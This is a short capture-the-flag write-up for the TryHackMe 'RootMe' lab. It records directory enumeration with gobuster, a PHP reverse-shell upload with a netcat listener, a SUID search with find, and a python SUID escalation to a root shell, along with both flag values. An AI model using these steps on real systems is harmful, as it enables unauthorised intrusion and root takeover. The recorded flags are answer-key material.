
		RootMe

------------------------------------------------------------------

gobuster -> /panel/,     and  /uploads/    was found

/panel/ -> could upload file.


php revers shell payload 


nc -lvnp port

user.txt -> THM{y0u_g0t_a_sh3ll}

-------------------------------------------------------------------

serach for files with suid permission -> find / -type f -user root -perm -4000 2>/dev/null

suid -> python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’

root.txt -> THM{pr1v1l3g3_3sc4l4t10n}
